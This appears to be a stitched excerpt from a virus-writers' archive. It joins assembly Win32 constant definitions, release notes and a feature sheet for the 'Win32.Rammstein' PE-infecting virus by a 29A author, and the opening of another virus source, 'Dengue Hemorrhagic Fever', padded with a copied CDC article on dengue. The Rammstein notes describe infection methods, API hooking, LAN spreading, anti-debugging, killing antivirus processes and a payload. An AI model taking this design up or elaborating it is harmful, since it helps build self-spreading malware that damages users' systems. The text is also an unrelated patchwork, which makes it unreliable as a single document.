SM_SAMEDISPLAYFORMAT EQU 81
SM_CMETRICS EQU 76
SM_REMOTESESSION EQU 1000
MNC_IGNORE EQU 0
MNC_CLOSE EQU 1
MNC_EXECUTE EQU 2
MNC_SELECT EQU 3
MND_CONTINUE EQU 0
MND_ENDMENU EQU 1
HBMMENU_CALLBACK EQU -1
HBMMENU_SYSTEM EQU 1
HBMMENU_MBAR_RESTORE EQU 2
HBMMENU_MBAR_MINIMIZE EQU 3
HBMMENU_MBAR_CLOSE EQU 5
HBMMENU_MBAR_CLOSE_D EQU 6
HBMMENU_MBAR_MINIMIZE_D EQU 7
HBMMENU_POPUP_CLOSE EQU 8
HBMMENU_POPUP_RESTORE EQU 9
HBMMENU_POPUP_MAXIMIZE EQU 10
HBMMENU_POPUP_MINIMIZE EQU 11
; State type
; GetDCEx() flags
; RedrawWindow() flags
; EnableScrollBar() flags
; MessageBox() Flags
; Shell definitions
NOTIFYICONDATA STRUC
cbSize DD SIZE NOTIFYICONDATA
hWnd DD 0
uID DD 0
uNIFlags DD 0
uCallbackMessage DD 0
hIcon DD 0
szTip DB 64 DUP(0)
NOTIFYICONDATA ENDS
; Color Types
CTLCOLOR_MSGBOX EQU 0
CTLCOLOR_EDIT EQU 1
CTLCOLOR_LISTBOX EQU 2
CTLCOLOR_BTN EQU 3
CTLCOLOR_DLG EQU 4
CTLCOLOR_SCROLLBAR EQU 5
CTLCOLOR_STATIC EQU 6
CTLCOLOR_MAX EQU 7
COLOR_SCROLLBAR EQU 0
COLOR_BACKGROUND EQU 1
COLOR_ACTIVECAPTION EQU 2
COLOR_INACTIVECAPTION EQU 3
COLOR_MENU EQU 4
COLOR_WINDOW EQU 5
COLOR_WINDOWFRAME EQU 6
COLOR_MENUTEXT EQU 7
COLOR_WINDOWTEXT EQU 8
COLOR_CAPTIONTEXT EQU 9
COLOR_ACTIVEBORDER EQU 10
COLOR_INACTIVEBORDER EQU 11
COLOR_APPWORKSPACE EQU 12
COLOR_HIGHLIGHT EQU 13
COLOR_HIGHLIGHTTEXT EQU 14
COLOR_BTNFACE EQU 15
COLOR_BTNSHADOW EQU 16
COLOR_GRAYTEXT EQU 17
COLOR_BTNTEXT EQU 18
COLOR_INACTIVECAPTIONTEXT EQU 19
COLOR_BTNHIGHLIGHT EQU 20
COLOR_3DDKSHADOW EQU 21
COLOR_3DLIGHT EQU 22
COLOR_INFOTEXT EQU 23
COLOR_INFOBK EQU 24
COLOR_HOTLIGHT EQU 26
COLOR_GRADIENTACTIVECAPTION EQU 27
COLOR_GRADIENTINACTIVECAPTION EQU 28
COLOR_DESKTOP EQU COLOR_BACKGROUND
COLOR_3DFACE EQU COLOR_BTNFACE
COLOR_3DSHADOW EQU COLOR_BTNSHADOW
COLOR_3DHIGHLIGHT EQU COLOR_BTNHIGHLIGHT
COLOR_3DHILIGHT EQU COLOR_BTNHIGHLIGHT
COLOR_BTNHILIGHT EQU COLOR_BTNHIGHLIGHT
; GetWindow() Constants
GW_HWNDFIRST EQU 0
GW_HWNDLAST EQU 1
GW_HWNDNEXT EQU 2
GW_HWNDPREV EQU 3
GW_OWNER EQU 4
GW_CHILD EQU 5
GW_MAX EQU 5
GW_ENABLEDPOPUP EQU 6
IMAGE_BITMAP EQU 0
IMAGE_ICON EQU 1
IMAGE_CURSOR EQU 2
IMAGE_ENHMETAFILE EQU 3
IDOK EQU 1
IDCANCEL EQU 2
IDABORT EQU 3
IDRETRY EQU 4
IDIGNORE EQU 5
IDYES EQU 6
IDNO EQU 7
IDCLOSE EQU 8
IDHELP EQU 9
WB_LEFT EQU 0
WB_RIGHT EQU 1
WB_ISDELIMITER EQU 2
BN_CLICKED EQU 0
BN_PAINT EQU 1
BN_HILITE EQU 2
BN_UNHILITE EQU 3
BN_DISABLE EQU 4
BN_DOUBLECLICKED EQU 5
BN_PUSHED EQU BN_HILITE
BN_UNPUSHED EQU BN_UNHILITE
BN_DBLCLK EQU BN_DOUBLECLICKED
BN_SETFOCUS EQU 6
BN_KILLFOCUS EQU 7
; Dialog Styles
; Dialog Codes
LB_OKAY EQU 0
LB_ERR EQU -1
LB_ERRSPACE EQU -2
LBN_ERRSPACE EQU -2
LBN_SELCHANGE EQU 1
LBN_DBLCLK EQU 2
LBN_SELCANCEL EQU 3
LBN_SETFOCUS EQU 4
LBN_KILLFOCUS EQU 5
; Listbox messages
; Listbox Styles
CB_OKAY EQU 0
CB_ERR EQU -1
CB_ERRSPACE EQU -2
CBN_ERRSPACE EQU -1
CBN_SELCHANGE EQU 1
CBN_DBLCLK EQU 2
CBN_SETFOCUS EQU 3
CBN_KILLFOCUS EQU 4
CBN_EDITCHANGE EQU 5
CBN_EDITUPDATE EQU 6
CBN_DROPDOWN EQU 7
CBN_CLOSEUP EQU 8
CBN_SELENDOK EQU 9
CBN_SELENDCANCEL EQU 10
CCS_TOP = 00000001h
CCS_NOMOVEY = 00000002h
CCS_BOTTOM = 00000003h
CCS_NORESIZE = 00000004h
CCS_NOPARENTALIGN = 00000008h
CCS_ADJUSTABLE = 00000020h
CCS_NODIVIDER = 00000040h
TBSTATE_CHECKED = 01h
TBSTATE_PRESSED = 02h
TBSTATE_ENABLED = 04h
TBSTATE_HIDDEN = 08h
TBSTATE_INDETERMINATE = 10h
TBSTATE_WRAP = 20h
TBSTYLE_BUTTON = 00h
TBSTYLE_SEP = 01h
TBSTYLE_CHECK = 02h
TBSTYLE_GROUP = 04h
TBSTYLE_CHECKGROUP = TBSTYLE_GROUP+TBSTYLE_CHECK
TBSTYLE_TOOLTIPS = 0100h
TBSTYLE_WRAPABLE = 0200h
TBSTYLE_ALTDRAG = 0400h
TB_ENABLEBUTTON = (WM_USER + 1)
TB_CHECKBUTTON = (WM_USER + 2)
TB_PRESSBUTTON = (WM_USER + 3)
TB_HIDEBUTTON = (WM_USER + 4)
TB_INDETERMINATE = (WM_USER + 5)
TB_ISBUTTONENABLED = (WM_USER + 9)
TB_ISBUTTONCHECKED = (WM_USER + 10)
TB_ISBUTTONPRESSED = (WM_USER + 11)
TB_ISBUTTONHIDDEN = (WM_USER + 12)
TB_ISBUTTONINDETERMINATE = (WM_USER + 13)
TB_SETSTATE = (WM_USER + 17)
TB_GETSTATE = (WM_USER + 18)
TB_ADDBITMAP = (WM_USER + 19)
TB_SAVERESTOREA = (WM_USER + 26)
TB_SAVERESTOREW = (WM_USER + 76)
TB_CUSTOMIZE = (WM_USER + 27)
TB_ADDSTRINGA = (WM_USER + 28)
TB_ADDSTRINGW = (WM_USER + 77)
TB_GETITEMRECT = (WM_USER + 29)
TB_BUTTONSTRUCTSIZE = (WM_USER + 30)
TB_SETBUTTONSIZE = (WM_USER + 31)
TB_SETBITMAPSIZE = (WM_USER + 32)
TB_AUTOSIZE = (WM_USER + 33)
TB_GETTOOLTIPS = (WM_USER + 35)
TB_SETTOOLTIPS = (WM_USER + 36)
TB_SETPARENT = (WM_USER + 37)
TB_SETROWS = (WM_USER + 39)
TB_GETROWS = (WM_USER + 40)
TB_SETCMDID = (WM_USER + 42)
TB_CHANGEBITMAP = (WM_USER + 43)
TB_GETBITMAP = (WM_USER + 44)
TB_GETBUTTONTEXTA = (WM_USER + 45)
TB_GETBUTTONTEXTW = (WM_USER + 75)
TB_REPLACEBITMAP = (WM_USER + 46)
SPI_GETBEEP EQU 1
SPI_SETBEEP EQU 2
SPI_GETMOUSE EQU 3
SPI_SETMOUSE EQU 4
SPI_GETBORDER EQU 5
SPI_SETBORDER EQU 6
SPI_GETKEYBOARDSPEED EQU 10
SPI_SETKEYBOARDSPEED EQU 11
SPI_LANGDRIVER EQU 12
SPI_ICONHORIZONTALSPACING EQU 13
SPI_GETSCREENSAVETIMEOUT EQU 14
SPI_SETSCREENSAVETIMEOUT EQU 15
SPI_GETSCREENSAVEACTIVE EQU 16
SPI_SETSCREENSAVEACTIVE EQU 17
SPI_GETGRIDGRANULARITY EQU 18
SPI_SETGRIDGRANULARITY EQU 19
SPI_SETDESKWALLPAPER EQU 20
SPI_SETDESKPATTERN EQU 21
SPI_GETKEYBOARDDELAY EQU 22
SPI_SETKEYBOARDDELAY EQU 23
SPI_ICONVERTICALSPACING EQU 24
SPI_GETICONTITLEWRAP EQU 25
SPI_SETICONTITLEWRAP EQU 26
SPI_GETMENUDROPALIGNMENT EQU 27
SPI_SETMENUDROPALIGNMENT EQU 28
SPI_SETDOUBLECLKWIDTH EQU 29
SPI_SETDOUBLECLKHEIGHT EQU 30
SPI_GETICONTITLELOGFONT EQU 31
SPI_SETDOUBLECLICKTIME EQU 32
SPI_SETMOUSEBUTTONSWAP EQU 33
SPI_SETICONTITLELOGFONT EQU 34
SPI_GETFASTTASKSWITCH EQU 35
SPI_SETFASTTASKSWITCH EQU 36
SPI_SETDRAGFULLWINDOWS EQU 37
SPI_GETDRAGFULLWINDOWS EQU 38
SPI_GETNONCLIENTMETRICS EQU 41
SPI_SETNONCLIENTMETRICS EQU 42
SPI_GETMINIMIZEDMETRICS EQU 43
SPI_SETMINIMIZEDMETRICS EQU 44
SPI_GETICONMETRICS EQU 45
SPI_SETICONMETRICS EQU 46
SPI_SETWORKAREA EQU 47
SPI_GETWORKAREA EQU 48
SPI_SETPENWINDOWS EQU 49
SPI_GETHIGHCONTRAST EQU 66
SPI_SETHIGHCONTRAST EQU 67
SPI_GETKEYBOARDPREF EQU 68
SPI_SETKEYBOARDPREF EQU 69
SPI_GETSCREENREADER EQU 70
SPI_SETSCREENREADER EQU 71
SPI_GETANIMATION EQU 72
SPI_SETANIMATION EQU 73
SPI_GETFONTSMOOTHING EQU 74
SPI_SETFONTSMOOTHING EQU 75
SPI_SETDRAGWIDTH EQU 76
SPI_SETDRAGHEIGHT EQU 77
SPI_SETHANDHELD EQU 78
SPI_GETLOWPOWERTIMEOUT EQU 79
SPI_GETPOWEROFFTIMEOUT EQU 80
SPI_SETLOWPOWERTIMEOUT EQU 81
SPI_SETPOWEROFFTIMEOUT EQU 82
SPI_GETLOWPOWERACTIVE EQU 83
SPI_GETPOWEROFFACTIVE EQU 84
SPI_SETLOWPOWERACTIVE EQU 85
SPI_SETPOWEROFFACTIVE EQU 86
SPI_SETCURSORS EQU 87
SPI_SETICONS EQU 88
SPI_GETDEFAULTINPUTLANG EQU 89
SPI_SETDEFAULTINPUTLANG EQU 90
SPI_SETLANGTOGGLE EQU 91
SPI_GETWINDOWSEXTENSION EQU 92
SPI_SETMOUSETRAILS EQU 93
SPI_GETMOUSETRAILS EQU 94
SPI_SETSCREENSAVERRUNNING EQU 97
SPI_SCREENSAVERRUNNING EQU SPI_SETSCREENSAVERRUNNING
SPI_GETFILTERKEYS EQU 50
SPI_SETFILTERKEYS EQU 51
SPI_GETTOGGLEKEYS EQU 52
SPI_SETTOGGLEKEYS EQU 53
SPI_GETMOUSEKEYS EQU 54
SPI_SETMOUSEKEYS EQU 55
SPI_GETSHOWSOUNDS EQU 56
SPI_SETSHOWSOUNDS EQU 57
SPI_GETSTICKYKEYS EQU 58
SPI_SETSTICKYKEYS EQU 59
SPI_GETACCESSTIMEOUT EQU 60
SPI_SETACCESSTIMEOUT EQU 61
SPI_GETSERIALKEYS EQU 62
SPI_SETSERIALKEYS EQU 63
SPI_GETSOUNDSENTRY EQU 64
SPI_SETSOUNDSENTRY EQU 65
SPI_GETSNAPTODEFBUTTON EQU 95
SPI_SETSNAPTODEFBUTTON EQU 96
SPI_GETMOUSEHOVERWIDTH EQU 98
SPI_SETMOUSEHOVERWIDTH EQU 99
SPI_GETMOUSEHOVERHEIGHT EQU 100
SPI_SETMOUSEHOVERHEIGHT EQU 101
SPI_GETMOUSEHOVERTIME EQU 102
SPI_SETMOUSEHOVERTIME EQU 103
SPI_GETWHEELSCROLLLINES EQU 104
SPI_SETWHEELSCROLLLINES EQU 105
SPI_GETMENUSHOWDELAY EQU 106
SPI_SETMENUSHOWDELAY EQU 107
SPI_GETSHOWIMEUI EQU 110
SPI_SETSHOWIMEUI EQU 111
SPI_GETMOUSESPEED EQU 112
SPI_SETMOUSESPEED EQU 113
SPI_GETSCREENSAVERRUNNING EQU 114
SPI_GETACTIVEWINDOWTRACKING EQU 1000h
SPI_SETACTIVEWINDOWTRACKING EQU 1001h
SPI_GETMENUANIMATION EQU 1002h
SPI_SETMENUANIMATION EQU 1003h
SPI_GETCOMBOBOXANIMATION EQU 1004h
SPI_SETCOMBOBOXANIMATION EQU 1005h
SPI_GETLISTBOXSMOOTHSCROLLING EQU 1006h
SPI_SETLISTBOXSMOOTHSCROLLING EQU 1007h
SPI_GETGRADIENTCAPTIONS EQU 1008h
SPI_SETGRADIENTCAPTIONS EQU 1009h
SPI_GETKEYBOARDCUES EQU 100Ah
SPI_SETKEYBOARDCUES EQU 100Bh
SPI_GETMENUUNDERLINES EQU SPI_GETKEYBOARDCUES
SPI_SETMENUUNDERLINES EQU SPI_SETKEYBOARDCUES
SPI_GETACTIVEWNDTRKZORDER EQU 100Ch
SPI_SETACTIVEWNDTRKZORDER EQU 100Dh
SPI_GETHOTTRACKING EQU 100Eh
SPI_SETHOTTRACKING EQU 100Fh
SPI_GETMENUFADE EQU 1012h
SPI_SETMENUFADE EQU 1013h
SPI_GETSELECTIONFADE EQU 1014h
SPI_SETSELECTIONFADE EQU 1015h
SPI_GETTOOLTIPANIMATION EQU 1016h
SPI_SETTOOLTIPANIMATION EQU 1017h
SPI_GETTOOLTIPFADE EQU 1018h
SPI_SETTOOLTIPFADE EQU 1019h
SPI_GETCURSORSHADOW EQU 101Ah
SPI_SETCURSORSHADOW EQU 101Bh
SPI_GETUIEFFECTS EQU 103Eh
SPI_SETUIEFFECTS EQU 103Fh
SPI_GETFOREGROUNDLOCKTIMEOUT EQU 2000h
SPI_SETFOREGROUNDLOCKTIMEOUT EQU 2001h
SPI_GETACTIVEWNDTRKTIMEOUT EQU 2002h
SPI_SETACTIVEWNDTRKTIMEOUT EQU 2003h
SPI_GETFOREGROUNDFLASHCOUNT EQU 2004h
SPI_SETFOREGROUNDFLASHCOUNT EQU 2005h
SPI_GETCARETWIDTH EQU 2006h
SPI_SETCARETWIDTH EQU 2007h
; NMHDR
NMHDR struc
hwndFrom UINT ?
idFrom UINT ?
code UINT ?
NMHDR ends
; TOOLTIPTEXT
TOOLTIPTEXT struc
hdr NMHDR <?>
lpszText ULONG ?
szText db 80 dup(?)
hinst ULONG ?
uFlags UINT ?
TOOLTIPTEXT ends
DISP_CHANGE_SUCCESSFUL EQU 0
DISP_CHANGE_RESTART EQU 1
DISP_CHANGE_FAILED EQU -1
DISP_CHANGE_BADMODE EQU -2
DISP_CHANGE_NOTUPDATED EQU -3
DISP_CHANGE_BADFLAGS EQU -4
DISP_CHANGE_BADPARAM EQU -5
; EVENT DEFINITION
SOUND_SYSTEM_STARTUP EQU 1
SOUND_SYSTEM_SHUTDOWN EQU 2
SOUND_SYSTEM_BEEP EQU 3
SOUND_SYSTEM_ERROR EQU 4
SOUND_SYSTEM_QUESTION EQU 5
SOUND_SYSTEM_WARNING EQU 6
SOUND_SYSTEM_INFORMATION EQU 7
SOUND_SYSTEM_MAXIMIZE EQU 8
SOUND_SYSTEM_MINIMIZE EQU 9
SOUND_SYSTEM_RESTOREUP EQU 10
SOUND_SYSTEM_RESTOREDOWN EQU 11
SOUND_SYSTEM_APPSTART EQU 12
SOUND_SYSTEM_FAULT EQU 13
SOUND_SYSTEM_APPEND EQU 14
SOUND_SYSTEM_MENUCOMMAND EQU 15
SOUND_SYSTEM_MENUPOPUP EQU 16
CSOUND_SYSTEM EQU 16
CCHILDREN_TITLEBAR EQU 5
CCHILDREN_SCROLLBAR EQU 5
CURSOR_SHOWING EQU 00000001h
HELP_CONTEXT = 0001h
HELP_QUIT = 0002h
HELP_INDEX = 0003h
HELP_CONTENTS = 0003h
HELP_HELPONHELP = 0004h
HELP_SETINDEX = 0005h
HELP_SETCONTENTS = 0005h
HELP_CONTEXTPOPUP = 0008h
HELP_FORCEFILE = 0009h
HELP_KEY = 0101h
HELP_COMMAND = 0102h
HELP_PARTIALKEY = 0105h
HELP_MULTIKEY = 0201h
HELP_SETWINPOS = 0203h
HELP_CONTEXTMENU = 000ah
HELP_FINDER = 000bh
HELP_WM_HELP = 000ch
HELP_SETPOPUP_POS = 000dh
HELP_TCARD = 8000h
HELP_TCARD_DATA = 0010h
HELP_TCARD_OTHER_CALLER = 0011h
IDH_NO_HELP = 28440
IDH_MISSING_CONTEXT = 28441
IDH_GENERIC_HELP_BUTTON = 28442
IDH_OK = 28443
IDH_CANCEL = 28444
IDH_HELP = 28445
OSVERSIONINFOA STRUCT
dwOSVersionInfoSize DD ?
dwMajorVersion DD ?
dwMinorVersion DD ?
dwBuildNumber DD ?
dwPlatformId DD ?
szCSDVersion DB 128 DUP(?)
OSVERSIONINFOA ENDS
v4.0
= Final Release =
===================================================================
DISCLAIMER
09 Sep 2000 - Today I made a small improvement. When the dropper roams
the net onto another computer it remains in the windows
dir and it represents a weak point which might be noticed
by an av. So, now, the virus will smartly remove either
the dropper or the entry in the win.ini file if one of
them is missing. If both are there, they are left alone
because they will remove eachother. Added Pstores.exe to
the black list. Thanks to Evul for pointing me out that
it is a rather peculiar file and cannot be safely
infected.
22 Jul 2000 - The virus has moved up to version 4.0. Today I added
the network infector. It comes in a separate thread.
For the moment it looks like everything works fine. Will
add a timer to it so that it does not hang in huge
networks... Virus is above 14k now... Waiting for the
LZ!
22 May 2000 - Added EPO on files that have the viral code outside the
code section. Basically from now on the entry point stays
only inside the code section. The epo is not actually epo,
because as I started to code it I decided to make it very
complicated so I will include the complicated part in the
next release. It will be the so called LJILE32 <Lord
Julus' Instruction Length Engine 32>. This engine will
allow me to have an exact location of the opcode for each
instruction so we will be able to look up any call, jump
or conditional jump to place our code call there. So for
this version only a jump at the original eip.
21 May 2000 - Fixed a bug in the api hooker... I forgot that some import
sections have a null pointer to names. Also added the
infection by last section increase for files that cannot
be infected otherwise. All files should be touched now.
Also I fixed the problem with the payload window not
closing after the process closed. I solved half of it
as some files like wordpad.exe still have this problem.
====================================================================
Virus Name ........... Win32.Rammstein
Virus Version ........ 4.0
Virus Size ........... 13346 (debug), 14520 (release)
Virus Author ......... Lord Julus / 29A
Release Date ......... 04 May 2000
Virus type ........... PE infector
Target OS ............ Win95, Win98, WinNT, Win2000
Target Files ......... many PE file types:
EXE COM ACM CPL HDI OCX PCI
QTC SCR X32 CNV FMT OCM OLB WPC
Append Method ........ The virus will check whether there is enough room
for it inside the code section. If there is not
enough room the virus will be placed at end. If
there is it will be inserted inside the code
section at a random offset while the original
code will be saved at end. The placing at the end
has also two variants. If the last section is
Resources or Relocations the virus will insert a
new section before the last section and place the
data there, also rearranging the last section's
RVAs. If the last section is another section a
new section will be placed at end. The name of
the new section is a common section name which is
chosen based on the existing names so that it
does not repeat. If the virus is placed at the
end just a small EPO code is used so that the eip
stays inside the code section.
A special situation occurs if there is not enough
space to add a new section header, for example
when the code section starts at RVA 200 (end of
headers). In this situation the virus will
increase the last section in order to append.
Infect Methods ....... -Direct file attacks: the virus will attack
specific files in the windows directory, files
which are most used by people
-Directory scan: all files in the current
directory will be infected, as well as 3 files in
the system directory and 3 in the windows
directory
-Api hooking (per-process residency): the virus
hooks a few api calls and infects files as the
victim uses the apis
-Intranet spreading: the virus spreads into the
LAN using only windows apis
Features ............. Multiple threads: the virus launches a main
thread. While this thread executes, at the same
time, the original thread returns to the host, so no
slowdown appears. The main viral thread
launches 6 other threads and monitors their
execution. If one of the threads is not able to
finish, the system is hung, because it means
somebody tried to patch some of the thread code.
Heavy anti-debugging: I tried to use almost all
the anti-debug and anti-emulation stuff that I
know
FPU: uses fpu instructions
Crc32 search: uses crc32 to avoid waste of space
Memory roaming: allocates virtual memory and
jumps in it
Interlaced code: this means that some threads
share the same piece of code and the virus is
careful to let only one in at the same time,
otherwise some of the variables get destroyed.
Pretty hard to be emulated by AVs.
Also features semaphores, timers
Marks infection using the Pythagorean numbers.
SEH: the virus creates 9 SEH handlers, for each
thread and for the main thread.
(*) Polymorphic .......... Yes (2 engines: LJMLPE32, LJFPE32)
(*) Metamorphic .......... Yes (mild custom metamorphic engine)
Encrypted ............ Yes
Safety ............... Yes (avoids infecting many files)
Kill AV Processes .... Yes
Payload .............. On the 14th of every even month the infected process
will launch a thread that will display random
windows with some of the Rammstein's lyrics.
Pretty annoying... Probably this is the first
virus that actually creates real windows and
processes their messages. The windows shut down
as the victim process closes.
(*) Feature not included in this version.
Debug notes: please note that this source code features many ways of
debugging. You may turn on and off most of the virus's features by
turning some variables to TRUE or FALSE.
====================================================================
$
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[DESC.TXT]ÄÄÄ
;============================================================================
;
; Dengue Hemorrhagic Fever
;
; BioCoded by GriYo / 29A
; griyo@bi0.net
;
;============================================================================
;
; About the biomodel
; ------------------
;
; Dengue Hemorrhagic Fever: The Emergence of a Global Health Problem
;
; Dengue and dengue hemorrhagic fever (DHF) are caused by one of four
;closely related, but antigenically distinct, virus serotypes (DEN-1, DEN-2,
;DEN-3, and DEN-4), of the genus Flavivirus. Infection with one of these
;serotypes does not provide cross-protective immunity, so persons living in
;a dengue-endemic area can have four dengue infections during their
;lifetimes. Dengue is primarily an urban disease of the tropics, and the
;viruses that cause it are maintained in a cycle that involves humans and
;Aedes aegypti, a domestic, day-biting mosquito that prefers to feed on
;humans. Infection with a dengue virus serotype can produce a spectrum of
;clinical illness, ranging from a nonspecific viral syndrome to severe and
;fatal hemorrhagic disease. Important risk factors for DHF include the
;strain and serotype of the virus involved, as well as the age, immune
;status, and genetic predisposition of the patient.
;
; The first reported epidemics of dengue fever occurred in 1779-1780
;in Asia, Africa, and North America; the near simultaneous occurrence of
;outbreaks on three continents indicates that these viruses and their
;mosquito vector have had a worldwide distribution in the tropics for more
;than 200 years. During most of this time, dengue fever was considered a
;benign, nonfatal disease of visitors to the tropics. Generally, there were
;long intervals (10-40 years) between major epidemics, mainly because the
;viruses and their mosquito vector could only be transported between
;population centers by sailing vessels.
;
; A global pandemic of dengue began in Southeast Asia after World
;War II and has intensified during the last 15 years. Epidemics caused by
;multiple serotypes (hyperendemicity) are more frequent, the geographic
;distribution of dengue viruses has expanded, and DHF has emerged in the
;Pacific region and the Americas. In Southeast Asia, epidemic DHF
;first appeared in the 1950s, but by 1975 it had become a leading cause of
;hospitalization and death among children in many countries. In the 1980s,
;DHF began a second expansion into Asia when Sri Lanka, India, and the
;Maldive Islands had their first major DHF epidemics; Pakistan first
;reported an epidemic of dengue fever in 1994. The recent epidemics in
;Sri Lanka and India were associated with multiple dengue virus serotypes,
;but DEN-3 was predominant and was genetically distinct from DEN-3 viruses
;previously isolated from infected persons in those countries.
;
; After an absence of 35 years, epidemic dengue fever occurred in
;both Taiwan and the People's Republic of China in the 1980s. The People's
;Republic of China had a series of epidemics caused by all four serotypes,
;and its first major epidemic of DHF, caused by DEN-2, was reported on
;Hainan Island in 1985. Singapore also had a resurgence of dengue/DHF
;from 1990 to 1994 after a successful control program had prevented
;significant transmission for over 20 years. In other countries of Asia
;where DHF is endemic, the epidemics have become progressively larger in the
;last 15 years.
;
; In the Pacific, dengue viruses were reintroduced in the early 1970s
;after an absence of more than 25 years. Epidemic activity caused by all
;four serotypes has intensified in recent years with major epidemics of DHF
;on several islands.
;
; Despite poor surveillance for dengue in Africa, we know that
;epidemic dengue fever caused by all four serotypes has increased
;dramatically since 1980. Most activity has occurred in East Africa, and
;major epidemics were reported for the first time in the Seychelles (1977),
;Kenya (1982, DEN-2), Mozambique (1985, DEN-3), Djibouti (1991-92, DEN-2),
;Somalia (1982, 1993, DEN-2), and Saudi Arabia (1994, DEN-2) (CDC,
;unpublished data). Epidemic DHF has been reported in neither Africa nor the
;Middle East, but sporadic cases clinically compatible with DHF have been
;reported from Mozambique, Djibouti, and Saudi Arabia (CDC, unpublished
;data).
;
; The emergence of dengue/DHF as a major public health problem has
;been most dramatic in the American region. In an effort to prevent urban
;yellow fever, which is also transmitted by Ae. aegypti, the Pan American
;Health Organization organized a campaign that eradicated Ae. aegypti from
;most Central and South American countries in the 1950s and 1960s. As a
;result, epidemic dengue occurred only sporadically in some Caribbean
;islands during this period. The Ae. aegypti eradication program, which was
;officially discontinued in the United States in 1970, gradually eroded
;elsewhere, and this species began to reinfest countries from which it had
;been eradicated. In 1995, the geographic distribution of Ae. aegypti was
;similar to its distribution before the eradication program.
;
; In 1970, only DEN-2 virus was present in the Americas, although
;DEN-3 may have had a focal distribution in Colombia and Puerto Rico. In
;1977, DEN-1 was introduced and caused major epidemics throughout the
;region over a 16-year period. DEN-4 was introduced in 1981 and caused
;similar widespread epidemics. Also in 1981, a new strain of DEN-2 from
;Southeast Asia caused the first major DHF epidemic in the Americas (Cuba).
;This strain has spread rapidly throughout the region and has caused
;outbreaks of DHF in Venezuela, Colombia, Brazil, French Guiana, Suriname,
;and Puerto Rico. By 1995, 14 countries in the American region had reported
;confirmed DHF cases, and DHF is endemic in many of these countries.
;
; DEN-3 virus recently reappeared in the Americas after an absence of
;16 years. This serotype was first detected in association with a 1994
;dengue/DHF epidemic in Nicaragua. Almost simultaneously, DEN-3 was
;confirmed in Panama and, in early 1995, in Costa Rica (CDC, unpublished
;data). In Nicaragua, considerable numbers of DHF were associated with the
;epidemic, which was apparently caused by DEN-3. In Panama and Costa Rica,
;the cases were classic dengue fever.
;
; Viral envelope gene sequence data from the DEN-3 strains isolated
;from Panama and Nicaragua have shown that this new American DEN-3 virus
;strain was likely a recent introduction from Asia since it is genetically
;distinct from the DEN-3 strain found previously in the Americas, but is
;identical to the DEN-3 virus serotype that caused major DHF epidemics in
;Sri Lanka and India in the 1980s (R. Lanciotti; unpublished data). The new
;DEN-3 strain, and the susceptibility of the population in the American
;tropics to it, suggests that DEN-3 will spread rapidly throughout the
;region and likely will cause major epidemics of dengue/DHF in the near
;future.
;
; In 1995, dengue is the most important mosquito-borne viral disease
;affecting humans; its global distribution is comparable to that of malaria,
;and an estimated 2.5 billion people are living in areas at risk for epidemic
;transmission. Each year, tens of millions of cases of dengue fever occur
;and, depending on the year, up to hundreds of thousands of cases of DHF. The
;case-fatality rate of DHF in most countries is about 5%: most fatal cases
;are among children.
;
; There is a small, but significant, risk for dengue outbreaks in the
;continental United States. Two competent mosquito vectors, Ae. aegypti and
;Aedes albopictus, are present and, under certain circumstances, each could
;transmit dengue viruses. This type of transmission has been detected twice
;in the last 15 years in south Texas (1980 and 1986) and has been associated
;with dengue epidemics in northern Mexico. Moreover, numerous viruses are
;introduced annually by travelers returning from tropical areas where dengue
;viruses are endemic. From 1977 to 1994, a total of 2,248 suspected cases of
;imported dengue were reported in the United States (CDC, unpublished data).
;Although some specimens collected were not adequate for laboratory
;diagnosis, preliminary data indicate that 481 (21%) cases were confirmed as
;dengue (CDC, unpublished data). Many more cases probably go unreported each
;year because surveillance in the United States is passive and relies on
;physicians to recognize the disease, inquire about the patient's travel
;history, obtain proper diagnostic samples, and report the case. These data
;underscore the fact that southern Texas and the southeastern United States,
;where Ae. aegypti is found, are at risk for dengue transmission and
;sporadic outbreaks.
;
; The reasons for this dramatic global emergence of dengue/DHF as a
;major public health problem are complex and not well understood. However,
;several important factors can be identified. First, effective mosquito
;control is virtually nonexistent in most dengue-endemic countries.
;Considerable emphasis for the past 20 years has been placed on
;ultra-low-volume insecticide space sprays for adult mosquito control, a
;relatively ineffective approach for controlling Ae. aegypti. Second, major
;global demographic changes have occurred, the most important of which have
;been uncontrolled urbanization and concurrent population growth. These
;demographic changes have resulted in substandard housing and inadequate
;water, sewer, and waste management systems, all of which increase
;Ae. aegypti population densities and facilitate transmission of
;Ae. aegypti-borne disease. Third, increased travel by airplane provides
;the ideal mechanism for transporting dengue viruses between population
;centers of the tropics, resulting in a constant exchange of dengue viruses
;and other pathogens. Lastly, in most countries the public health
;infrastructure has deteriorated. Limited financial and human resources and
;competing priorities have resulted in a "crisis mentality" with emphasis
;on implementing so-called emergency control methods in response to
;epidemics rather than on developing programs to prevent epidemic
;transmission. This approach has been particularly detrimental to dengue
;control because, in most countries, surveillance is very inadequate; the
;system to detect increased transmission normally relies on reports by local
;physicians who often do not consider dengue in their diagnoses. As a result,
;an epidemic has often reached or passed the peak of transmission before it
;is detected.
;
; No dengue vaccine is available. Recently, however, attenuated
;candidate vaccine viruses have been developed in Thailand. These vaccines
;are safe and immunogenic when given in various formulations, including a
;quadrivalent vaccine for all four dengue virus serotypes. Unfortunately,
;efficacy trials in human volunteers have yet to be initiated. Research is
;also being conducted to develop second-generation recombinant vaccine
;viruses; the Thailand attenuated viruses are used as a template. However,
;an effective dengue vaccine for public use will not be available for 5 to
;10 years.
;
; Prospects for reversing the recent trend of increased epidemic
;activity and geographic expansion of dengue are not promising. New dengue
;virus strains and serotypes will likely continue to be introduced into many
;areas where the population densities of Ae. aegypti are at high levels. With
;no new mosquito control technology available, in recent years public health
;authorities have emphasized disease prevention and mosquito control through
;community efforts to reduce larval breeding sources. Although this approach
;will probably be effective in the long run, it is unlikely to impact disease
;transmission in the near future. We must, therefore, develop improved,
;proactive, laboratory-based surveillance systems that can provide early
;warning of an impending dengue epidemic. At the very least, surveillance
;results can alert the public to take action and physicians to diagnose and
;properly treat dengue/DHF cases.
;
;Duane J. Gubler and Gary G. Clark
;National Center for Infectious Diseases
;Centers for Disease Control and Prevention
;Fort Collins, Colorado, and San Juan, Puerto Rico, USA
;
;============================================================================
.386P
locals
jumps
.model flat,STDCALL
include Win32api.inc
include Useful.inc
include Mz.inc
include Pe.inc
